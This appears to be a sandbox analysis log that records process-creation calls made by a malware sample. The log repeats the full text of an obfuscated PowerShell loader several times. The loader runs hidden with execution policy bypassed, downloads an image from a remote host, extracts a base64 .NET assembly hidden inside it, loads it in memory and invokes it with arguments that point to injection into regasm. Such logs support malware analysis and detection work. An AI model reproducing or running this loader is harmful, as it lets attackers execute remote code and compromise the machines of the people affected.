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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('USoxM','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://wallpapercave.com/uwp/uwp4098462.png';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LldFSy8xLzMwOTEvMTkuNi44OS4xNDEvLzpwdHRo' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlcento'))"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2812
thread_handle: 0x00000570
process_identifier: 2808
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JUSoxMBpUSoxMG0USoxMYQBnUSoxMGUUSoxMVQByUSoxMGwUSoxMIUSoxMUSoxM9USoxMCUSoxMUSoxMJwBoUSoxMHQUSoxMdUSoxMBwUSoxMHMUSoxMOgUSoxMvUSoxMC8USoxMdwBhUSoxMGwUSoxMbUSoxMBwUSoxMGEUSoxMcUSoxMBlUSoxMHIUSoxMYwBhUSoxMHYUSoxMZQUSoxMuUSoxMGMUSoxMbwBtUSoxMC8USoxMdQB3USoxMHUSoxMUSoxMLwB1USoxMHcUSoxMcUSoxMUSoxM0USoxMDUSoxMUSoxMOQUSoxM4USoxMDQUSoxMNgUSoxMyUSoxMC4USoxMcUSoxMBuUSoxMGcUSoxMJwUSoxM7USoxMCQUSoxMdwBlUSoxMGIUSoxMQwBsUSoxMGkUSoxMZQBuUSoxMHQUSoxMIUSoxMUSoxM9USoxMCUSoxMUSoxMTgBlUSoxMHcUSoxMLQBPUSoxMGIUSoxMagBlUSoxMGMUSoxMdUSoxMUSoxMgUSoxMFMUSoxMeQBzUSoxMHQUSoxMZQBtUSoxMC4USoxMTgBlUSoxMHQUSoxMLgBXUSoxMGUUSoxMYgBDUSoxMGwUSoxMaQBlUSoxMG4USoxMdUSoxMUSoxM7USoxMCQUSoxMaQBtUSoxMGEUSoxMZwBlUSoxMEIUSoxMeQB0USoxMGUUSoxMcwUSoxMgUSoxMD0USoxMIUSoxMUSoxMkUSoxMHcUSoxMZQBiUSoxMEMUSoxMbUSoxMBpUSoxMGUUSoxMbgB0USoxMC4USoxMRUSoxMBvUSoxMHcUSoxMbgBsUSoxMG8USoxMYQBkUSoxMEQUSoxMYQB0USoxMGEUSoxMKUSoxMUSoxMkUSoxMGkUSoxMbQBhUSoxMGcUSoxMZQBVUSoxMHIUSoxMbUSoxMUSoxMpUSoxMDsUSoxMJUSoxMBpUSoxMG0USoxMYQBnUSoxMGUUSoxMVUSoxMBlUSoxMHgUSoxMdUSoxMUSoxMgUSoxMD0USoxMIUSoxMBbUSoxMFMUSoxMeQBzUSoxMHQUSoxMZQBtUSoxMC4USoxMVUSoxMBlUSoxMHgUSoxMdUSoxMUSoxMuUSoxMEUUSoxMbgBjUSoxMG8USoxMZUSoxMBpUSoxMG4USoxMZwBdUSoxMDoUSoxMOgBVUSoxMFQUSoxMRgUSoxM4USoxMC4USoxMRwBlUSoxMHQUSoxMUwB0USoxMHIUSoxMaQBuUSoxMGcUSoxMKUSoxMUSoxMkUSoxMGkUSoxMbQBhUSoxMGcUSoxMZQBCUSoxMHkUSoxMdUSoxMBlUSoxMHMUSoxMKQUSoxM7USoxMCQUSoxMcwB0USoxMGEUSoxMcgB0USoxMEYUSoxMbUSoxMBhUSoxMGcUSoxMIUSoxMUSoxM9USoxMCUSoxMUSoxMJwUSoxM8USoxMDwUSoxMQgBBUSoxMFMUSoxMRQUSoxM2USoxMDQUSoxMXwBTUSoxMFQUSoxMQQBSUSoxMFQUSoxMPgUSoxM+USoxMCcUSoxMOwUSoxMkUSoxMGUUSoxMbgBkUSoxMEYUSoxMbUSoxMBhUSoxMGcUSoxMIUSoxMUSoxM9USoxMCUSoxMUSoxMJwUSoxM8USoxMDwUSoxMQgBBUSoxMFMUSoxMRQUSoxM2USoxMDQUSoxMXwBFUSoxME4USoxMRUSoxMUSoxM+USoxMD4USoxMJwUSoxM7USoxMCQUSoxMcwB0USoxMGEUSoxMcgB0USoxMEkUSoxMbgBkUSoxMGUUSoxMeUSoxMUSoxMgUSoxMD0USoxMIUSoxMUSoxMkUSoxMGkUSoxMbQBhUSoxMGcUSoxMZQBUUSoxMGUUSoxMeUSoxMB0USoxMC4USoxMSQBuUSoxMGQUSoxMZQB4USoxME8USoxMZgUSoxMoUSoxMCQUSoxMcwB0USoxMGEUSoxMcgB0USoxMEYUSoxMbUSoxMBhUSoxMGcUSoxMKQUSoxM7USoxMCQUSoxMZQBuUSoxMGQUSoxMSQBuUSoxMGQUSoxMZQB4USoxMCUSoxMUSoxMPQUSoxMgUSoxMCQUSoxMaQBtUSoxMGEUSoxMZwBlUSoxMFQUSoxMZQB4USoxMHQUSoxMLgBJUSoxMG4USoxMZUSoxMBlUSoxMHgUSoxMTwBmUSoxMCgUSoxMJUSoxMBlUSoxMG4USoxMZUSoxMBGUSoxMGwUSoxMYQBnUSoxMCkUSoxMOwUSoxMkUSoxMHMUSoxMdUSoxMBhUSoxMHIUSoxMdUSoxMBJUSoxMG4USoxMZUSoxMBlUSoxMHgUSoxMIUSoxMUSoxMtUSoxMGcUSoxMZQUSoxMgUSoxMDUSoxMUSoxMIUSoxMUSoxMtUSoxMGEUSoxMbgBkUSoxMCUSoxMUSoxMJUSoxMBlUSoxMG4USoxMZUSoxMBJUSoxMG4USoxMZUSoxMBlUSoxMHgUSoxMIUSoxMUSoxMtUSoxMGcUSoxMdUSoxMUSoxMgUSoxMCQUSoxMcwB0USoxMGEUSoxMcgB0USoxMEkUSoxMbgBkUSoxMGUUSoxMeUSoxMUSoxM7USoxMCQUSoxMcwB0USoxMGEUSoxMcgB0USoxMEkUSoxMbgBkUSoxMGUUSoxMeUSoxMUSoxMgUSoxMCsUSoxMPQUSoxMgUSoxMCQUSoxMcwB0USoxMGEUSoxMcgB0USoxMEYUSoxMbUSoxMBhUSoxMGcUSoxMLgBMUSoxMGUUSoxMbgBnUSoxMHQUSoxMaUSoxMUSoxM7USoxMCQUSoxMYgBhUSoxMHMUSoxMZQUSoxM2USoxMDQUSoxMTUSoxMBlUSoxMG4USoxMZwB0USoxMGgUSoxMIUSoxMUSoxM9USoxMCUSoxMUSoxMJUSoxMBlUSoxMG4USoxMZUSoxMBJUSoxMG4USoxMZUSoxMBlUSoxMHgUSoxMIUSoxMUSoxMtUSoxMCUSoxMUSoxMJUSoxMBzUSoxMHQUSoxMYQByUSoxMHQUSoxMSQBuUSoxMGQUSoxMZQB4USoxMDsUSoxMJUSoxMBiUSoxMGEUSoxMcwBlUSoxMDYUSoxMNUSoxMBDUSoxMG8USoxMbQBtUSoxMGEUSoxMbgBkUSoxMCUSoxMUSoxMPQUSoxMgUSoxMCQUSoxMaQBtUSoxMGEUSoxMZwBlUSoxMFQUSoxMZQB4USoxMHQUSoxMLgBTUSoxMHUUSoxMYgBzUSoxMHQUSoxMcgBpUSoxMG4USoxMZwUSoxMoUSoxMCQUSoxMcwB0USoxMGEUSoxMcgB0USoxMEkUSoxMbgBkUSoxMGUUSoxMeUSoxMUSoxMsUSoxMCUSoxMUSoxMJUSoxMBiUSoxMGEUSoxMcwBlUSoxMDYUSoxMNUSoxMBMUSoxMGUUSoxMbgBnUSoxMHQUSoxMaUSoxMUSoxMpUSoxMDsUSoxMJUSoxMBjUSoxMG8USoxMbQBtUSoxMGEUSoxMbgBkUSoxMEIUSoxMeQB0USoxMGUUSoxMcwUSoxMgUSoxMD0USoxMIUSoxMBbUSoxMFMUSoxMeQBzUSoxMHQUSoxMZQBtUSoxMC4USoxMQwBvUSoxMG4USoxMdgBlUSoxMHIUSoxMdUSoxMBdUSoxMDoUSoxMOgBGUSoxMHIUSoxMbwBtUSoxMEIUSoxMYQBzUSoxMGUUSoxMNgUSoxM0USoxMFMUSoxMdUSoxMByUSoxMGkUSoxMbgBnUSoxMCgUSoxMJUSoxMBiUSoxMGEUSoxMcwBlUSoxMDYUSoxMNUSoxMBDUSoxMG8USoxMbQBtUSoxMGEUSoxMbgBkUSoxMCkUSoxMOwUSoxMkUSoxMGwUSoxMbwBhUSoxMGQUSoxMZQBkUSoxMEEUSoxMcwBzUSoxMGUUSoxMbQBiUSoxMGwUSoxMeQUSoxMgUSoxMD0USoxMIUSoxMBbUSoxMFMUSoxMeQBzUSoxMHQUSoxMZQBtUSoxMC4USoxMUgBlUSoxMGYUSoxMbUSoxMBlUSoxMGMUSoxMdUSoxMBpUSoxMG8USoxMbgUSoxMuUSoxMEEUSoxMcwBzUSoxMGUUSoxMbQBiUSoxMGwUSoxMeQBdUSoxMDoUSoxMOgBMUSoxMG8USoxMYQBkUSoxMCgUSoxMJUSoxMBjUSoxMG8USoxMbQBtUSoxMGEUSoxMbgBkUSoxMEIUSoxMeQB0USoxMGUUSoxMcwUSoxMpUSoxMDsUSoxMJUSoxMB0USoxMHkUSoxMcUSoxMBlUSoxMCUSoxMUSoxMPQUSoxMgUSoxMCQUSoxMbUSoxMBvUSoxMGEUSoxMZUSoxMBlUSoxMGQUSoxMQQBzUSoxMHMUSoxMZQBtUSoxMGIUSoxMbUSoxMB5USoxMC4USoxMRwBlUSoxMHQUSoxMVUSoxMB5USoxMHUSoxMUSoxMZQUSoxMoUSoxMCcUSoxMRgBpUSoxMGIUSoxMZQByUSoxMC4USoxMSUSoxMBvUSoxMG0USoxMZQUSoxMnUSoxMCkUSoxMOwUSoxMkUSoxMG0USoxMZQB0USoxMGgUSoxMbwBkUSoxMCUSoxMUSoxMPQUSoxMgUSoxMCQUSoxMdUSoxMB5USoxMHUSoxMUSoxMZQUSoxMuUSoxMEcUSoxMZQB0USoxME0USoxMZQB0USoxMGgUSoxMbwBkUSoxMCgUSoxMJwBWUSoxMEEUSoxMSQUSoxMnUSoxMCkUSoxMLgBJUSoxMG4USoxMdgBvUSoxMGsUSoxMZQUSoxMoUSoxMCQUSoxMbgB1USoxMGwUSoxMbUSoxMUSoxMsUSoxMCUSoxMUSoxMWwBvUSoxMGIUSoxMagBlUSoxMGMUSoxMdUSoxMBbUSoxMF0USoxMXQUSoxMgUSoxMCgUSoxMJwBkUSoxMEgUSoxMaUSoxMUSoxMwUSoxMEwUSoxMbUSoxMBkUSoxMEYUSoxMUwB5USoxMDgUSoxMeUSoxMBMUSoxMHoUSoxMTQB3USoxME8USoxMVUSoxMBFUSoxMHYUSoxMTQBUUSoxMGsUSoxMdQBOUSoxMGkUSoxMNUSoxMUSoxM0USoxME8USoxMUwUSoxM0USoxMHgUSoxMTgBEUSoxMEUUSoxMdgBMUSoxMHoUSoxMcUSoxMB3USoxMGQUSoxMSUSoxMBSUSoxMG8USoxMJwUSoxMgUSoxMCwUSoxMIUSoxMUSoxMnUSoxMCcUSoxMIUSoxMUSoxMsUSoxMCUSoxMUSoxMJwUSoxMyUSoxMCcUSoxMIUSoxMUSoxMsUSoxMCUSoxMUSoxMJwByUSoxMGUUSoxMZwBhUSoxMHMUSoxMbQUSoxMnUSoxMCUSoxMUSoxMLUSoxMUSoxMgUSoxMCcUSoxMNQUSoxMnUSoxMCUSoxMUSoxMLUSoxMUSoxMgUSoxMCcUSoxMQwUSoxM6USoxMFwUSoxMVwBpUSoxMG4USoxMZUSoxMBvUSoxMHcUSoxMcwBcUSoxMFQUSoxMZQBtUSoxMHUSoxMUSoxMXUSoxMUSoxMnUSoxMCwUSoxMIUSoxMUSoxMnUSoxMGgUSoxMdUSoxMBtUSoxMGwUSoxMYwBlUSoxMG4USoxMdUSoxMBvUSoxMCcUSoxMKQUSoxMpUSoxMUSoxM==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('USoxM','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000578
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -command "$Codigo = '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